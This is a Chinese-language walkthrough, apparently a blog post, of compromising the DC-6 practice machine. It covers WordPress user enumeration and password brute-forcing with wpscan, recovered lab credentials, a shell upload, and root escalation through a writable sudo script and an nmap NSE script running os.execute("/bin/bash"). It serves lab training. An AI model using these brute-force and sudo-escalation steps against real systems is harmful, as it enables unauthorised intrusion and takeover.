DC-6靶机

搜索靶机的ip地址

arp-scan -l

image-20230806225223028

靶机:192.168.149.145
主机:192.168.149.129

扫描端口

nmap -sS -A 192.168.149.145 -p-

image-20230806230058872

访问80端口,无法访问,但是有显示wordy,需要重新编辑hosts文件

image-20230806230254648

image-20230806230434870

image-20230806231842968

扫描目录

文件扫描:dirsearch -u "http://wordy"

image-20230806231002637

信息收集

登录网站
发现wp-login.php,访问后出现登录界面

在这里插入图片描述

爆破用户名
利用wpscan工具,输入

wpscan --url http://wordy/ -e u

image-20230806232503174

爆破出五个用户名:
admin、mark、graham、sarah、jens
根据靶机简介,可以找到一个密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 

image-20230806233729265

image-20230806234408652

爆破密码
wpscan --url http://wordy/ -e -U use.txt -P passwords.txt

image-20230806235151845

Username: mark, Password: helpdesk01
登录

image-20230806235405863

上传文件

image-20230807172000574

shell上传

上传shell,抓包,并监听端口

image-20230809164156695

交互

在这里插入图片描述

查看用户

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-B8irZcCh-1692518408422)(https://gitee.com/gxxlovehqy/cartographic-bed/raw/master/img/image-20230809201202047.png)]

进入mark 的目录下

在这里插入图片描述

image-20230809201712025

打开文件

image-20230809201813641

找到用户名和密码:graham - GSo7isUM1D4

切换用户

image-20230809201953684

在/home/jens下找到一个文件

在这里插入图片描述

image-20230809205214659

#!/bin/sh表示用/bin/sh解释脚本并执行
添加echo "/bin/bash" >> backups.sh

image-20230809210916183

提权

sudo -u jens ./backups.sh

image-20230809211024864

查看是否有提权的工具

image-20230809211122668

利用 nmap 提权

原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root

echo 'os.execute("/bin/bash")' > shell.nse #创建一个 shell.nse 的文件,并且写入os.execute("/bin/bash")

解释:

--script: 指定自己的脚本文件

image-20230809211222563

sudo -u root nmap --script=shell.nse   #以root用户执行 nmap

image-20230809211454322

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值